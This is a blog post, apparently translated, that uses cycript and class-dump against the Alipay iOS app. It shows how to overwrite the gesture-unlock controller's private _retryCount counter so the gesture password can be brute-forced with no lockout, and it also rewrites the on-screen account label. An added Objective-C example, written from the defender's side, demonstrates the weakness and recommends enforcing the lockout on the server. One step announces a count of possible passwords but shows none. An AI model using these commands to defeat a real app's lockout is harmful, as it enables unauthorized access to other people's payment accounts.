Hack in practice: removing the gesture-unlock retry limit in the Alipay app
The previous post only covered how to use the tools. This one puts them into practice, hacking with cycript against class-dump output, at the expense of the Alipay app.
First, the usual routine: get hold of the gesture-unlock screen's View Controller:
cy# var app = [UIApplication sharedApplication]
@""
cy# var keyWindow = app.keyWindow
@"<UIWindow: 0x16591bd0; frame = (0 0; 320 568); gestureRecognizers = ; layer = >"
cy# var root = keyWindow.rootViewController
@""
cy# var visible = root.visibleViewController
@""
Next, with the class-dump-z output as reference, let's look at what in GestureUnlockViewController can be put to use:
@interface GestureUnlockViewController : DTViewController {
@private
    GestureHeadImageView* _headImageView;
    GestureTipLabel* _tipLabel;
    GestureInputView* _inputView;
    DTButton* _forgetButton;
    DTButton* _changeAccountButton;
    int _retryCount;
    UIView* _guideView;
    id _delegate;
}
@property(assign, nonatomic) __weak id delegate;
-(void).cxx_destruct;
-(BOOL)shouldAutorotateToInterfaceOrientation:(int)interfaceOrientation;
-(void)headClicked;
-(void)gestureInputView:(id)view didFinishWithPassword:(id)password;
-(void)gestureInputViewFirstEffectiveTouch:(id)touch;
-(void)alertView:(id)view clickedButtonAtIndex:(int)index;
-(void)actionChangeAccountToLogin;
-(void)actionResetPswBtnClick;
-(void)resetCurrentUser;
-(void)resetPsw;
-(void)viewWillDisappear:(BOOL)view;
-(void)notifyFaceToFacePayReceivedData:(id)facePayReceivedData;
-(void)viewWillAppear:(BOOL)view;
-(void)breakFirstRun;
-(BOOL)isFirstRun;
-(void)guideViewClicked:(id)clicked;
-(void)viewDidLoad;
-(void)viewWillLayoutSubviews;
@end
_tipLabel looks like the label that shows the account name and the operation prompt. As I noted in the previous post, @private does not restrict keyPath access, so let's now change the username shown on the Alipay login page:
cy# [visible setValue:@"Test By yiyaaixuexi" forKeyPath:@"_tipLabel.text"]
Alipay's gesture-password unlock limits the number of attempts: five consecutive wrong attempts and you have to log in again. I wanted to remove that limit on unlock retries, and found that the counter recording the attempts is an int, int _retryCount. That made me unhappy, because I could not change its value through KVC. No matter, though, I can reach it through the pointer:
cy# visible->_retryCount = 0
0
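As an added example (not the page's or Alipay's code), here is a constructed Objective-C controller with the same int _retryCount ivar, beside a variant that switches off KVC access to ivars; the class names and the tryKvcReset helper are assumptions, and it is written from the defender's side to show what the @private counter does and does not protect against.

```objc
#import <Foundation/Foundation.h>
// Constructed stand-in (not Alipay's code) for a controller that keeps its
// lockout counter in a @private ivar, like the int _retryCount dumped above.
@interface IvarCounterController : NSObject {
@private
    int _retryCount;
}
- (BOOL)recordFailedAttempt;   // YES = locked out, re-login required
@end
@implementation IvarCounterController
- (BOOL)recordFailedAttempt { return ++_retryCount >= 5; }
@end
// Hardened stand-in: refuses KVC access to ivars, so "_retryCount" and
// "_tipLabel.text"-style key paths raise NSUndefinedKeyException instead.
@interface NoKvcCounterController : IvarCounterController
@end
@implementation NoKvcCounterController
+ (BOOL)accessInstanceVariablesDirectly { return NO; }
@end
// Hypothetical helper: YES if 'key' was writable through KVC, NO if refused.
static BOOL tryKvcReset(id obj, NSString *key) {
    @try {
        [obj setValue:@0 forKey:key];
        return YES;
    } @catch (NSException *e) {
        return NO;   // NSUndefinedKeyException from the hardened class
    }
}
int main(void) {
    @autoreleasepool {
        IvarCounterController *weak = [IvarCounterController new];
        for (int i = 0; i < 4; i++) [weak recordFailedAttempt];
        // @private did not help: KVC zeroes the counter, so the fifth
        // failure no longer locks the account.
        BOOL reset = tryKvcReset(weak, @"_retryCount");
        NSLog(@"ivar counter: kvcReset=%d locked=%d", reset, [weak recordFailedAttempt]);
        NoKvcCounterController *hard = [NoKvcCounterController new];
        for (int i = 0; i < 4; i++) [hard recordFailedAttempt];
        reset = tryKvcReset(hard, @"_retryCount");
        NSLog(@"no-KVC counter: kvcReset=%d locked=%d", reset, [hard recordFailedAttempt]);
        // Caveat: this only closes the KVC route. A direct write like the
        // cycript "visible->_retryCount = 0" above still hits the ivar, so a
        // client-side counter is only a UX hint; enforce the lockout server-side.
    }
    return 0;
}
```

Build with clang and the Foundation framework; the second NSLog shows the hardened class still locking after five failures because the KVC reset was refused.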
Now I can brute-force the gesture password programmatically with no limit. Let's work out how many possibilities there are:
That number is a bit large for me, but for the iPhone 5's CPU it is a piece of cake~
Wait a moment, what is the password format?
-(void)gestureInputView:(id)view didFinishWithPassword:(id)password;
A password of type id: very rigorous, and it adds quite a bit of trouble to the hack~
No matter; we can use Method Swizzling to print out what the password actually is, but that seems to deserve a new article of its own...